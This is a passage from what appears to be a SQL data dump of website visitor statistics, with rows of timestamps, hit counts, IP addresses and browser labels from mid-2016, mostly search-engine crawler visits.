26,2,2,0,0,'130.193.50.34','other'),(46347,1467319302,1,0,1,0,'66.249.75.199',''),(46348,1467319596,1,1,0,0,'141.8.183.25','other'),(46349,1467320124,1,1,0,0,'52.3.127.144','other'),(46350,1467321146,1,0,1,0,'66.249.75.207',''),(46351,1467321297,1,0,1,0,'66.249.75.199',''),(46352,1467321398,1,1,0,0,'40.77.167.49','other'),(46353,1467322166,1,1,0,0,'51.255.65.77','other'),(46354,1467322493,1,1,0,0,'141.8.183.25','other'),(46355,1467322504,2,2,0,0,'130.193.50.34','other'),(46356,1467322792,1,0,1,0,'66.249.78.143',''),(46357,1467322958,1,0,1,0,'66.249.78.171',''),(46358,1467323402,1,1,0,0,'141.8.183.25','other'),(46359,1467323590,1,1,0,0,'130.193.51.19','other'),(46360,1467324549,1,1,0,0,'141.8.183.25','other'),(46361,1467324649,1,0,1,0,'66.249.78.171',''),(46362,1467325165,1,0,1,0,'66.249.75.207',''),(46363,1467325514,2,2,0,0,'130.193.51.19','other'),(46364,1467325517,2,2,0,0,'141.8.183.25','other'),(46365,1467325543,1,1,0,0,'130.193.50.34','other'),(46366,1467326241,1,1,0,0,'180.76.15.7','other'),(46367,1467328679,1,1,0,0,'40.77.167.49','other'),(46368,1467328722,1,1,0,0,'164.132.161.44','other'),(46369,1467329071,1,1,0,0,'141.8.142.58','other'),(46370,1467329072,3,3,0,0,'141.8.183.25','other'),(46371,1467329216,1,1,0,0,'130.193.50.34','other'),(46372,1467329307,1,0,1,0,'66.249.75.199',''),(46373,1467329429,1,1,0,0,'130.193.51.19','other'),(46374,1467329996,2,2,0,0,'141.8.183.25','other'),(46375,1467330006,1,0,1,0,'66.249.78.150',''),(46376,1467330260,1,1,0,0,'180.76.15.32','other'),(46377,1467330352,1,1,0,0,'130.193.50.34','other'),(46378,1467330853,2,2,0,0,'130.193.51.19','other'),(46379,1467331194,1,1,0,0,'51.255.65.84','other'),(46380,1467331470,1,1,0,0,'141.8.183.25','other'),(46381,1467331544,1,1,0,0,'157.55.39.81','other'),(46382,1467332319,1,1,0,0,'157.55.39.75','other'),(46383,1467332654,1,1,0,0,'141.8.183.25','other'),(46384,1467332655,1,1,0,0,'130.193.51.19','other'),(46385,1467333839,1,1,0,0,'130.193.50.34','other'),(46386,1467333978,1,1,0,0,'141.8.183.25','other'),(46387,1467334704,1,0,1,0,'66.249.78.136',''),(46388,1467336583,1,0,1,0,'66.249.78.143',''),(46389,1467336945,1,0,1,0,'66.249.78.171',''),(46390,1467337358,1,1,0,0,'52.3.105.23','other'),(46391,1467337423,1,1,0,0,'130.193.50.34','other'),(46392,1467337877,1,1,0,0,'130.193.51.19','other'),(46393,1467338402,1,1,0,0,'40.77.167.49','other'),(46394,1467339442,1,1,0,0,'130.193.51.19','other'),(46395,1467339444,1,1,0,0,'141.8.142.61','other'),(46396,1467340089,1,0,1,0,'66.249.78.164',''),(46397,1467340388,1,1,0,0,'52.3.105.23','other'),(46398,1467340618,1,0,1,0,'66.249.78.178',''),(46399,1467340640,1,0,1,0,'66.249.78.171',''),(46400,1467340761,1,0,1,0,'68.180.229.171',''),(46401,1467340894,1,1,0,0,'52.3.127.144','other'),(46402,1467340923,1,0,1,0,'66.249.75.231',''),(46403,1467341908,1,1,0,0,'141.8.183.25','other'),(46404,1467342603,1,1,0,0,'157.55.39.75','other'),(46405,1467342778,1,0,1,0,'68.180.229.171',''),(46406,1467343674,2,2,0,0,'130.193.50.34','other'),(46407,1467343695,1,1,0,0,'141.8.142.61','other'),(46408,1467343939,1,1,0,0,'141.8.183.25','other'),(46409,1467343952,1,1,0,0,'180.76.15.12','other'),(46410,1467344487,1,1,0,0,'52.3.127.144','other'),(46411,1467344825,1,0,1,0,'66.249.78.178',''),(46412,1467344865,1,0,1,0,'68.180.229.171',''),(46413,1467345013,1,1,0,0,'40.77.167.49','other'),(46414,1467345221,1,0,1,0,'66.249.78.143',''),(46415,1467345378,1,1,0,0,'130.193.50.34','other'),(46416,1467345379,1,1,0,0,'141.8.183.25','other'),(46417,1467346182,1,0,1,0,'66.249.78.164',''),(46418,1467346484,1,1,0,0,'130.193.51.19','other'),(46419,1467346904,1,0,1,0,'66.249.78.136',''),(46420,1467347614,1,0,1,0,'66.249.78.171',''),(46421,1467348172,1,1,0,0,'52.3.127.144','other'),(46422,1467348361,1,1,0,0,'144.76.8.132','other'),(46423,1467348452,1,1,0,0,'141.8.183.25','other'),(46424,1467348815,1,0,1,0,'66.249.78.171',''),(46425,1467349373,1,1,0,0,'157.55.39.81','other'),(46426,1467349761,1,0,1,0,'66.249.75.191',''),(46427,1467351176,1,1,0,0,'141.8.142.58','other'),(46428,1467351372,1,1,0,0,'141.8.183.25','other'),(46429,1467351520,2,2,0,0,'130.193.51.19','other'),(46430,1467351858,1,1,0,0,'212.86.228.37','chrome'),(46431,1467351934,1,1,0,0,'91.196.178.67','firefox'),(46432,1467352019,1,1,0,0,'91.196.179.33','firefox'),(46433,1467352067,3,3,0,0,'130.193.50.34','other'),(46434,1467352185,1,1,0,0,'91.196.178.66','firefox'),(46435,1467352288,5,5,0,0,'141.8.183.25','other'),(46436,1467352446,1,1,0,0,'66.249.93.117','chrome'),(46437,1467352506,1,1,0,0,'130.193.51.19','other'),(46438,1467352525,1,1,0,0,'66.249.78.171','chrome'),(46439,1467353095,1,1,0,0,'141.8.142.67','other'),(46440,1467353098,3,3,0,0,'141.8.183.19','other'),(46441,1467353253,2,2,0,0,'141.8.183.25','other'),(46442,1467353360,2,2,0,0,'141.8.142.58','other'),(46443,1467353474,2,2,0,0,'141.8.142.61','other'),(46444,1467353644,1,0,1,0,'66.249.78.143',''),(46445,1467353703,1,1,0,0,'91.196.178.67','firefox'),(46446,1467353834,1,0,1,0,'66.249.78.178',''),(46447,1467354005,1,1,0,0,'5.58.77.63','chrome'),(46448,1467354851,1,0,1,0,'66.249.69.180',''),(46449,1467355353,2,2,0,0,'141.8.183.25','other'),(46450,1467355354,1,1,0,0,'130.193.50.34','other'),(46451,1467355675,1,1,0,0,'157.55.39.81','other'),(46452,1467355679,2,2,0,0,'46.4.32.75','other'),(46453,1467356327,1,0,1,0,'66.249.78.171',''),(46454,1467356511,1,1,0,0,'52.3.105.23','other'),(46455,1467356584,1,0,1,0,'66.249.75.191',''),(46456,1467356769,1,1,0,0,'91.124.128.128','firefox'),(46457,1467357384,1,0,1,0,'66.249.78.178',''),(46458,1467357664,1,1,0,0,'92.112.105.189','chrome'),(46459,1467357725,1,1,0,0,'91.124.128.128','firefox'),(46460,1467358016,1,1,0,0,'52.3.105.23','other'),(46461,1467358231,4,4,0,0,'62.210.148.247','other'),(46462,1467358267,2,2,0,0,'91.196.178.67','firefox'),(46463,1467358494,1,1,0,0,'141.8.183.25','other'),(46464,1467358669,1,1,0,0,'180.76.15.5','other'),(46465,1467359114,1,1,0,0,'91.222.155.160','chrome'),(46466,1467359382,1,1,0,0,'91.196.178.67','firefox'),(46467,1467359729,1,1,0,0,'37.53.229.132','firefox'),(46468,1467360110,1,1,0,0,'37.52.59.253','chrome'),(46469,1467360129,1,1,0,0,'141.8.183.25','other'),(46470,1467360835,1,1,0,0,'46.174.243.85','firefox'),(46471,1467361027,1,1,0,0,'37.53.229.132','firefox'),(46472,1467361822,1,1,0,0,'37.54.19.227','chrome'),(46473,1467361970,3,3,0,0,'94.179.107.117','firefox'),(46474,1467362710,1,1,0,0,'130.193.50.34','other'),(46475,1467362711,1,1,0,0,'141.8.183.25','other'),(46476,1467362759,1,1,0,0,'37.54.19.227','chrome'),(46477,1467362966,2,2,0,0,'91.196.178.67','firefox'),(46478,1467363150,1,1,0,0,'40.77.167.49','other'),(46479,1467363202,1,1,0,0,'82.207.21.227','chrome'),(46480,1467363732,1,1,0,0,'37.54.19.227','chrome'),(46481,1467363756,1,1,0,0,'37.73.225.25','chrome'),(46482,1467363944,1,1,0,0,'54.244.48.9','msie'),(46484,1467364041,1,1,0,0,'94.179.107.117','firefox'),(46485,1467364243,1,1,0,0,'204.79.180.79','msie'),(46486,1467364702,1,1,0,0,'176.77.98.115','chrome'),(46487,1467364703,1,1,0,0,'176.77.98.205','firefox'),(46488,1467364882,1,0,1,0,'66.249.69.175',''),(46489,1467364987,1,0,1,0,'68.180.229.171',''),(46490,1467365362,6,6,0,0,'69.197.163.195','other'),(46491,1467366450,1,1,0,0,'91.196.178.67','firefox'),(46492,1467366454,1,1,0,0,'157.55.39.75','other'),(46493,1467367257,2,2,0,0,'69.30.234.186','other'),(46494,1467367484,1,1,0,0,'91.196.178.67','firefox'),(46495,1467367806,1,1,0,0,'82.207.21.227','chrome'),(46496,1467368052,2,2,0,0,'141.8.183.25','other'),(46497,1467368054,1,1,0,0,'130.193.51.19','other'),(46498,1467368226,1,1,0,0,'92.112.202.15','chrome'),(46499,1467368895,1,1,0,0,'46.200.163.82','chrome'),(46500,1467368957,1,1,0,0,'130.193.51.19','other'),(46501,1467370354,1,1,0,0,'91.124.128.128','firefox'),(46502,1467370757,1,1,0,0,'141.8.183.25','other'),(46503,1467370849,1,1,0,0,'95.133.98.176','chrome'),(46504,1467372031,1,1,0,0,'95.133.98.176','chrome'),(46505,1467372040,1,1,0,0,'93.75.50.63','chrome'),(46506,1467372048,1,1,0,0,'91.196.178.71','firefox'),(46507,1467372470,1,1,0,0,'91.196.178.161','chrome'),(46508,1467372897,1,1,0,0,'130.193.50.34','other'),(46509,1467373134,1,1,0,0,'91.196.178.131','firefox'),(46510,1467373578,1,1,0,0,'141.8.142.58','other'),(46511,1467373581,1,1,0,0,'93.158.152.84','other'),(46512,1467374051,1,1,0,0,'93.75.50.63','chrome'),(46513,1467374565,1,1,0,0,'180.76.15.7','other'),(46514,1467374982,1,1,0,0,'52.3.105.23','other'),(46515,1467375146,1,1,0,0,'91.196.178.131','chrome'),(46516,1467375339,1,1,0,0,'91.196.178.67','firefox'),(46517,1467375516,1,1,0,0,'40.77.167.49','other'),(46518,1467376033,1,0,1,0,'66.249.78.143',''),(46519,1467376463,1,1,0,0,'157.55.39.81','other'),(46520,1467376845,1,1,0,0,'91.196.178.67','firefox'),(46521,1467377260,2,2,0,0,'141.8.183.25','other'),(46522,1467377327,1,1,0,0,'178.95.211.205','opera'),(46523,1467377618,1,1,0,0,'52.3.105.23','other'),(46524,1467378301,1,1,0,0,'37.53.229.132','firefox'),(46525,1467378311,1,1,0,0,'180.76.15.24','other'),(46526,1467378449,1,0,1,0,'66.249.78.150',''),(46527,1467379112,1,1,0,0,'52.3.127.144','other'),(46528,1467379323,1,1,0,0,'52.3.105.23','other'),(46529,1467379336,1,1,0,0,'91.196.178.168','other'),(46530,1467379613,1,0,1,0,'66.249.78.164',''),(46531,1467379883,1,1,0,0,'157.55.39.81','other'),(46532,1467380431,1,1,0,0,'40.77.167.49','other'),(46533,1467380869,1,1,0,0,'141.8.183.25','other'),(46534,1467381050,1,1,0,0,'157.55.39.81','other'),(46535,1467381449,1,1,0,0,'95.132.123.171','chrome'),(46536,1467381952,2,2,0,0,'91.124.128.128','firefox'),(46537,1467382312,1,1,0,0,'144.76.29.66','other'),(46538,1467382971,1,0,1,0,'66.249.75.199',''),(46539,1467383382,1,1,0,0,'37.54.20.28','firefox'),(46540,1467383480,1,0,1,0,'66.249.78.143',''),(46541,1467383869,1,1,0,0,'141.8.142.58','other'),(46542,1467385629,1,1,0,0,'141.8.183.25','other'),(46543,1467385647,1,0,1,0,'66.249.78.178',''),(46544,1467386492,1,0,1,0,'66.249.78.150',''),(46545,1467386643,2,2,0,0,'130.193.50.34','other'),(46546,1467387196,1,1,0,0,'40.77.167.49','other'),(46547,1467387206,1,1,0,0,'141.8.142.58','other'),(46548,1467387782,1,1,0,0,'78.111.189.22','chrome'),(46549,1467388164,1,1,0,0,'66.249.78.150','chrome'),(46550,1467388761,1,0,1,0,'66.249.78.164',''),(46551,1467390984,1,1,0,0,'94.179.101.205','firefox'),(46552,1467392364,1,1,0,0,'193.194.127.217','firefox'),(46553,1467392546,1,1,0,0,'130.193.50.34','other'),(46554,1467392548,1,1,0,0,'141.8.142.58','other'),(46555,1467392979,2,2,0,0,'157.55.39.75','other'),(46556,1467394184,1,1,0,0,'37.54.20.28','firefox'),(46557,1467394911,1,1,0,0,'176.121.248.62','chrome'),(46558,1467395019,1,1,0,0,'130.193.50.34','other'),(46559,1467395020,1,1,0,0,'130.193.51.19','other'),(46560,1467395295,1,0,1,0,'66.249.78.178',''),(46561,1467395732,1,0,1,0,'66.249.75.207',''),(46562,1467396071,1,1,0,0,'91.196.178.69','firefox'),(46563,1467396323,1,0,1,0,'66.249.78.136',''),(46564,1467396640,1,1,0,0,'91.196.178.36','chrome'),(46565,1467397142,1,1,0,0,'157.55.39.75','other'),(46566,1467398127,1,1,0,0,'130.193.51.19','other'),(46567,1467398253,1,1,0,0,'130.193.50.34','other'),(46568,1467399020,2,0,2,0,'66.249.78.171',''),(46569,1467399379,1,1,0,0,'157.55.39.75','other'),(46570,1467400034,1,1,0,0,'52.3.105.23','other'),(46571,1467400348,2,2,0,0,'207.46.13.28','other'),(46572,1467400407,1,1,0,0,'91.196.178.103','chrome'),(46573,1467400486,1,0,1,0,'66.249.78.150',''),(46574,1467401140,1,1,0,0,'37.54.20.28','other'),(46575,1467401618,1,1,0,0,'157.55.39.75','other'),(46576,1467402021,1,0,1,0,'66.249.78.143',''),(46577,1467402207,1,1,0,0,'141.8.183.25','other'),(46578,1467402329,1,1,0,0,'141.8.142.61','other'),(46579,1467402456,2,2,0,0,'207.46.13.28','other'),(46580,1467402771,2,2,0,0,'130.193.50.34','other'),(46581,1467404238,1,0,1,0,'66.249.78.171',''),(46582,1467404384,1,1,0,0,'207.46.13.28','other'),(46583,1467406104,1,0,1,0,'66.249.75.247',''),(46584,1467406309,1,0,1,0,'66.249.78.157',''),(46585,1467407161,1,1,0,0,'40.77.167.49','other'),(46586,1467407192,1,1,0,0,'52.3.127.144','other'),(46587,1467407353,1,1,0,0,'130.193.51.19','other'),(46588,1467407357,3,3,0,0,'141.8.142.58','other'),(46589,1467407452,8,0,8,0,'68.180.229.171',''),(46590,1467407722,1,1,0,0,'52.3.105.23','other'),(46591,1467407818,1,1,0,0,'188.255.59.142','chrome'),(46592,1467407820,1,1,0,0,'195.91.224.113','firefox'),(46593,1467408388,2,0,2,0,'68.180.229.171',''),(46594,1467408667,1,0,1,0,'66.249.78.164',''),(46595,1467409404,1,0,1,0,'66.249.78.171',''),(46596,1467410460,1,0,1,0,'66.249.78.164',''),(46597,1467410592,2,2,0,0,'141.8.142.58','other'),(46598,1467411991,1,1,0,0,'180.76.15.17','other'),(46599,1467412353,1,0,1,0,'66.249.75.199',''),(46600,1467412996,1,0,1,0,'66.249.78.143',''),(46601,1467413041,1,0,1,0,'66.249.78.178',''),(46602,1467413079,1,1,0,0,'141.8.183.25','other'),(46603,1467413256,1,1,0,0,'207.46.13.28','other'),(46604,1467413328,1,0,1,0,'66.249.78.136',''),(46605,1467413369,1,0,1,0,'66.249.78.164',''),(46606,1467413404,1,1,0,0,'157.55.39.75','other'),(46607,1467413505,1,1,0,0,'40.77.167.49','other'),(46608,1467414636,2,1,1,0,'66.249.78.150',''),(46609,1467414656,1,1,0,0,'66.249.78.164','chrome'),(46610,1467415388,1,0,1,0,'66.249.75.199',''),(46611,1467415662,1,1,0,0,'141.8.142.61','other'),(46612,1467416553,1,0,1,0,'66.249.78.171',''),(46613,1467416572,1,1,0,0,'141.8.142.61','other'),(46614,1467416573,1,1,0,0,'141.8.183.25','other'),(46615,1467417064,1,0,1,0,'68.180.229.171',''),(46616,1467417391,1,1,0,0,'52.3.105.23','other'),(46617,1467417886,1,0,1,0,'66.249.78.178',''),(46618,1467418734,1,0,1,0,'68.180.229.171',''),(46619,1467419549,1,1,0,0,'66.249.78.136','chrome'),(46620,1467419668,1,0,1,0,'66.249.78.171',''),(46621,1467420088,1,1,0,0,'66.249.75.231','chrome'),(46622,1467420482,1,1,0,0,'141.8.183.25','other'),(46623,1467420483,1,1,0,0,'130.193.51.19','other'),(46624,1467420556,2,2,0,0,'146.185.130.231','other'),(46625,1467421620,1,1,0,0,'207.46.13.101','other'),(46626,1467422123,1,1,0,0,'130.193.50.34','other'),(46627,1467422125,1,1,0,0,'141.8.142.58','other'),(46628,1467423646,1,0,1,0,'66.249.75.199',''),(46629,1467423879,192,192,0,0,'209.126.127.49','other'),(46630,1467423968,1,0,1,0,'66.249.78.178',''),(46631,1467424728,1,1,0,0,'130.193.51.19','other'),(46632,1467424729,1,1,0,0,'141.8.142.58','other'),(46633,1467424781,107,107,0,0,'209.126.127.49','other'),(46634,1467425069,1,1,0,0,'151.80.31.100','other'),(46635,1467425496,1,0,1,0,'66.249.78.143',''),(46636,1467426122,1,1,0,0,'52.3.127.144','other'),(46637,1467426374,1,1,0,0,'192.187.104.235','other'),(46638,1467426778,1,1,0,0,'207.46.13.101','other'),(46639,1467427011,1,1,0,0,'180.76.15.150','other'),(46640,1467427491,1,1,0,0,'207.46.13.28','other'),(46641,1467427504,1,0,1,0,'68.180.229.171',''),(46642,1467427594,1,1,0,0,'151.80.31.181','other'),(46643,1467429597,1,1,0,0,'40.77.167.39','other'),(46644,1467430613,1,1,0,0,'95.221.211.113','msie'),(46645,1467430618,1,1,0,0,'92.242.81.181','msie'),(46646,1467431028,1,1,0,0,'180.76.15.155','other'),(46647,1467431470,1,1,0,0,'51.255.65.56','other'),(46648,1467431623,1,0,1,0,'66.249.78.178',''),(46649,1467431865,1,0,1,0,'66.249.75.199',''),(46650,1467432485,1,0,1,0,'66.249.78.143',''),(46651,1467432652,1,1,0,0,'40.77.167.49','other'),(46652,1467433025,1,1,0,0,'130.193.50.34','other'),(46653,1467433026,1,1,0,0,'141.8.183.25','other'),(46654,1467433363,2,1,1,0,'66.249.78.171',''),(46655,1467433979,1,0,1,0,'68.180.229.171',''),(46656,1467434117,1,1,0,0,'40.77.167.49','other'),(46657,1467435169,1,1,0,0,'66.249.78.143','chrome'),(46658,1467435491,1,1,0,0,'141.8.183.25','other'),(46659,1467435492,1,1,0,0,'130.193.50.34','other'),(46660,1467437861,1,1,0,0,'180.76.15.24','other'),(46661,1467437946,1,1,0,0,'198.50.131.46','other'),(46662,1467438019,2,0,2,0,'66.249.78.164',''),(46663,1467438387,97,97,0,0,'5.9.123.116','other'),(46664,1467438663,1,1,0,0,'91.124.37.252','firefox'),(46665,1467439044,1,1,0,0,'66.249.78.136','chrome'),(46666,1467439239,1,1,0,0,'207.46.13.101','other'),(46667,1467440448,1,1,0,0,'141.8.183.25','other'),(46668,1467440449,1,1,0,0,'130.193.50.34','other'),(46669,1467440601,1,1,0,0,'66.249.78.178','chrome'),(46670,1467440625,1,0,1,0,'66.249.78.171',''),(46671,1467440879,1,1,0,0,'91.124.37.252','firefox'),(46672,1467440958,1,1,0,0,'40.77.167.39','other'),(46673,1467441368,1,1,0,0,'66.249.93.125','chrome'),(46674,1467441424,4,4,0,0,'92.238.226.245','other'),(46675,1467441861,1,1,0,0,'40.77.167.39','other'),(46676,1467442749,1,1,0,0,'141.8.142.58','other'),(46677,1467442750,1,1,0,0,'130.193.50.34','other'),(46678,1467442970,1,1,0,0,'91.124.37.252','firefox'),(46679,1467443880,1,0,1,0,'66.249.78.164',''),(46680,1467444189,1,1,0,0,'130.193.51.19','other'),(46681,1467444190,1,1,0,0,'141.8.183.25','other'),(46682,1467444327,1,1,0,0,'207.46.13.28','other'),(46683,1467444755,3,1,2,0,'66.249.78.171',''),(46684,1467444794,1,1,0,0,'91.124.37.252','firefox'),(46685,1467445074,1,1,0,0,'82.207.91.234','firefox'),(46686,1467445630,1,0,1,0,'66.249.78.178',''),(46687,1467445874,4,4,0,0,'88.198.230.79','other'),(46688,1467446044,1,1,0,0,'66.249.78.136','chrome'),(46689,1467446529,2,2,0,0,'66.249.78.178','chrome'),(46690,1467446695,4,4,0,0,'130.193.50.34','other'),(46691,1467446728,1,1,0,0,'207.46.13.28','other'),(46692,1467447278,1,0,1,0,'66.249.78.143',''),(46693,1467448811,1,0,1,0,'66.249.78.178',''),(46694,1467452272,1,1,0,0,'66.249.78.164','chrome'),(46695,1467453417,1,1,0,0,'180.76.15.156','other'),(46696,1467453675,1,1,0,0,'194.44.120.57','chrome'),(46697,1467454077,3,3,0,0,'40.77.167.39','other'),(46698,1467454118,1,1,0,0,'195.225.147.30','opera'),(46699,1467454732,1,1,0,0,'52.3.105.23','other'),(46700,1467454836,1,0,1,0,'66.249.78.178',''),(46701,1467454859,1,1,0,0,'66.249.78.171','chrome'),(46702,1467454959,1,1,0,0,'207.46.13.101','other'),(46703,1467455488,1,1,0,0,'151.80.31.157','other'),(46704,1467455667,1,1,0,0,'178.93.14.117','opera'),(46705,1467455681,1,1,0,0,'40.77.167.39','other'),(46706,1467455984,1,0,1,0,'68.180.229.171',''),(46707,1467456394,1,1,0,0,'130.193.51.19','other'),(46708,1467456396,2,2,0,0,'141.8.142.58','other'),(46709,1467456476,1,1,0,0,'66.249.66.177','chrome'),(46710,1467456642,1,1,0,0,'141.8.183.25','other'),(46711,1467457829,1,1,0,0,'207.46.13.28','other'),(46712,1467458310,2,2,0,0,'40.77.167.49','other'),(46713,1467458807,1,1,0,0,'37.54.20.28','firefox'),(46714,1467458959,1,1,0,0,'207.46.13.28','other'),(46715,1467459365,1,1,0,0,'52.3.105.23','other'),(46716,1467460109,1,1,0,0,'66.249.78.178','chrome'),(46717,1467460356,1,0,1,0,'68.180.229.171',''),(46718,1467460374,1,0,1,0,'66.249.69.175',''),(46719,1467460575,2,1,1,0,'66.249.78.143',''),(46720,1467461010,2,2,0,0,'141.8.142.67','other'),(46721,1467461012,1,1,0,0,'130.193.51.19','other'),(46722,1467461052,1,1,0,0,'141.8.142.58','other'),(46723,1467462134,1,1,0,0,'93.158.152.84','other'),(46724,1467462135,1,1,0,0,'141.8.183.19','other'),(46725,1467462161,1,1,0,0,'141.8.142.58','other'),(46726,1467462162,1,1,0,0,'141.8.142.61','other'),(46727,1467462829,1,1,0,0,'66.249.78.164','chrome'),(46728,1467462912,1,1,0,0,'66.249.78.171','chrome'),(46729,1467463307,1,0,1,0,'66.249.78.178',''),(46730,1467463349,1,1,0,0,'207.46.13.28','other'),(46731,1467463574,1,0,1,0,'68.180.229.171',''),(46732,1467465112,1,1,0,0,'130.193.51.19','other'),(46733,1467465115,1,1,0,0,'141.8.142.58','other'),(46734,1467465179,1,0,1,0,'68.180.229.171',''),(46735,1467467139,1,1,0,0,'195.34.204.152','chrome'),(46736,1467467876,1,1,0,0,'91.196.178.163','other'),(46737,1467469298,1,0,1,0,'68.180.229.171',''),(46738,1467470137,1,1,0,0,'37.55.224.245','firefox'),(46739,1467470966,1,1,0,0,'141.8.142.58','other'),(46740,1467470967,1,1,0,0,'141.8.142.67','other'),(46741,1467471184,1,1,0,0,'40.77.167.39','other'),(46742,1467472320,1,1,0,0,'66.249.78.164','chrome'),(46743,1467473064,1,1,0,0,'207.46.13.101','other'),(46744,1467474401,1,1,0,0,'195.34.204.152','chrome'),(46745,1467475205,1,1,0,0,'141.8.183.25','other'),(46746,1467475206,1,1,0,0,'141.8.142.58','other'),(46747,1467476515,1,1,0,0,'207.46.13.101','other'),(46748,1467476912,1,1,0,0,'52.3.127.144','other'),(46749,1467476922,1,1,0,0,'141.8.183.19','other'),(46750,1467477763,1,0,1,0,'66.249.78.164',''),(46751,1467478017,1,1,0,0,'40.77.167.39','other'),(46752,1467479889,2,2,0,0,'141.8.142.58','other'),(46753,1467480026,1,1,0,0,'59.94.204.201','firefox'),(46754,1467480191,1,1,0,0,'37.55.224.245','firefox'),(46755,1467480235,1,1,0,0,'62.210.143.245','other'),(46756,1467481996,1,1,0,0,'141.8.142.61','other'),(46757,1467481997,1,1,0,0,'130.193.50.34','other'),(46758,1467482231,2,2,0,0,'52.3.127.144','other'),(46759,1467482689,1,1,0,0,'180.76.15.139','other'),(46760,1467482941,1,1,0,0,'94.179.121.39','firefox'),(46761,1467483637,1,0,1,0,'66.249.78.178',''),(46762,1467483794,1,1,0,0,'141.8.183.25','other'),(46763,1467483795,1,1,0,0,'130.193.50.34','other'),(46764,1467484944,2,2,0,0,'130.193.50.34','other'),(46765,1467485003,1,1,0,0,'207.46.13.170','other'),(46766,1467485072,1,1,0,0,'78.111.189.96','chrome'),(46767,1467485096,1,1,0,0,'91.196.178.65','chrome'),(46768,1467485161,1,1,0,0,'207.46.13.101','other'),(46769,1467485725,2,2,0,0,'141.8.183.25','other'),(46770,1467486664,1,0,1,0,'66.249.75.247',''),(46771,1467486707,1,1,0,0,'180.76.15.159','other'),(46772,1467486846,1,1,0,0,'130.193.51.19','other'),(46773,1467487105,2,2,0,0,'130.193.50.34','other'),(46774,1467487136,3,0,3,0,'68.180.229.171',''),(46775,1467487375,2,2,0,0,'141.8.183.25','other'),(46776,1467488177,1,1,0,0,'130.193.51.19','other'),(46777,1467488497,1,1,0,0,'130.193.50.34','other'),(46778,1467488808,1,1,0,0,'52.3.127.144','other'),(46779,1467489078,1,1,0,0,'207.46.13.101','other'),(46780,1467490056,2,2,0,0,'141.8.183.25','other'),(46781,1467490308,1,0,1,0,'66.249.78.164',''),(46782,1467490497,4,4,0,0,'130.193.50.34','other'),(46783,1467490931,1,0,1,0,'68.180.229.171',''),(46784,1467490989,1,1,0,0,'141.8.183.25','other'),(46785,1467491188,1,1,0,0,'130.193.50.6','other'),(46786,1467491398,1,1,0,0,'141.8.183.19','other'),(46787,1467491401,1,1,0,0,'141.8.142.85','other'),(46789,1467491405,1,1,0,0,'130.193.51.81','other'),(46790,1467491546,1,1,0,0,'141.8.132.10','other'),(46791,1467491621,1,1,0,0,'178.154.189.37','other'),(46792,1467491912,1,1,0,0,'141.8.132.41','other'),(46793,1467492361,1,0,1,0,'66.249.75.247',''),(46794,1467492410,1,1,0,0,'207.46.13.101','other'),(46795,1467492608,1,1,0,0,'178.154.189.31','other'),(46796,1467492656,1,1,0,0,'141.8.142.67','other'),(46797,1467492668,1,1,0,0,'52.3.105.23','other'),(46798,1467492717,1,1,0,0,'93.158.152.40','other'),(46799,1467492796,1,1,0,0,'141.8.142.61','other'),(46800,1467492835,1,1,0,0,'141.8.142.25','other'),(46801,1467492920,1,1,0,0,'141.8.132.41','other'),(46802,1467493133,1,1,0,0,'141.8.132.10','other'),(46803,1467493242,1,1,0,0,'141.8.142.62','other'),(46804,1467494810,1,1,0,0,'141.8.142.85','other'),(46805,1467494877,1,1,0,0,'180.76.15.28','other'),(46806,1467494929,1,1,0,0,'178.154.189.31','other'),(46807,1467495041,1,1,0,0,'40.77.167.39','other'),(46808,1467495055,1,1,0,0,'178.154.149.10','other'),(46809,1467496120,1,1,0,0,'141.8.184.11','other'),(46810,1467496121,1,1,0,0,'130.193.51.81','other'),(46811,1467496123,1,1,0,0,'130.193.51.19','other'),(46812,1467496416,1,1,0,0,'141.8.183.19','other'),(46813,1467497935,2,2,0,0,'207.46.13.101','other'),(46814,1467499632,1,1,0,0,'141.8.183.25','other'),(46815,1467499634,1,1,0,0,'141.8.142.67','other'),(46816,1467500093,1,1,0,0,'5.9.63.149','other'),(46817,1467500451,1,1,0,0,'130.193.51.43','other'),(46818,1467500852,1,1,0,0,'178.154.189.31','other'),(46819,1467501001,1,1,0,0,'207.46.13.170','other'),(46820,1467501058,1,1,0,0,'93.158.152.40','other'),(46821,1467501107,1,1,0,0,'130.193.51.19','other'),(46822,1467501152,1,1,0,0,'141.8.142.85','other'),(46823,1467501298,2,0,2,0,'66.249.78.178',''),(46824,1467502149,1,1,0,0,'178.154.189.37','other'),(46825,1467502526,1,0,1,0,'66.249.78.136',''),(46826,1467502943,1,0,1,0,'66.249.78.143',''),(46827,1467503054,1,1,0,0,'66.249.78.136','chrome'),(46828,1467503470,1,1,0,0,'130.193.50.34','other'),(46829,1467503472,1,1,0,0,'141.8.142.78','other'),(46830,1467503496,1,1,0,0,'180.76.15.159','other'),(46831,1467503847,2,2,0,0,'207.46.13.28','other'),(46832,1467503994,1,1,0,0,'40.77.167.39','other'),(46833,1467504282,1,1,0,0,'207.46.13.101','other'),(46834,1467504731,1,1,0,0,'66.249.78.150','chrome'),(46835,1467505094,1,1,0,0,'93.158.152.84','other'),(46836,1467505095,1,1,0,0,'141.8.142.62','other'),(46837,1467505400,2,2,0,0,'141.8.132.10','other'),(46838,1467505401,2,2,0,0,'130.193.50.6','other'),(46839,1467505403,1,1,0,0,'178.154.149.10','other'),(46840,1467505474,1,1,0,0,'130.193.37.7','other'),(46841,1467505813,1,1,0,0,'207.46.13.28','other'),(46842,1467506169,1,1,0,0,'141.8.142.61','other'),(46843,1467506171,1,1,0,0,'5.255.253.47','other'),(46844,1467506289,1,1,0,0,'40.77.167.39','other'),(46845,1467506753,1,0,1,0,'66.249.78.150',''),(46846,1467507251,1,0,1,0,'66.249.78.171',''),(46847,1467507573,5,5,0,0,'138.201.125.143','other'),(46848,1467507760,1,1,0,0,'141.8.132.10','other'),(46849,1467507889,1,1,0,0,'141.8.132.30','other'),(46850,1467508094,1,1,0,0,'141.8.183.19','other'),(46851,1467508278,1,1,0,0,'130.193.50.38','other'),(46852,1467508317,1,1,0,0,'141.8.142.67','other'),(46853,1467508524,1,1,0,0,'178.154.189.37','other'),(46854,1467508767,1,1,0,0,'178.154.189.31','other'),(46855,1467508803,1,1,0,0,'141.8.132.10','other'),(46856,1467508886,2,2,0,0,'130.193.50.6','other'),(46857,1467509165,1,1,0,0,'93.158.152.40','other'),(46858,1467509357,1,0,1,0,'66.249.78.171',''),(46859,1467509596,1,1,0,0,'93.158.152.61','other'),(46860,1467509993,1,1,0,0,'207.46.13.101','other'),(46861,1467510044,1,0,1,0,'68.180.229.171',''),(46862,1467510869,1,1,0,0,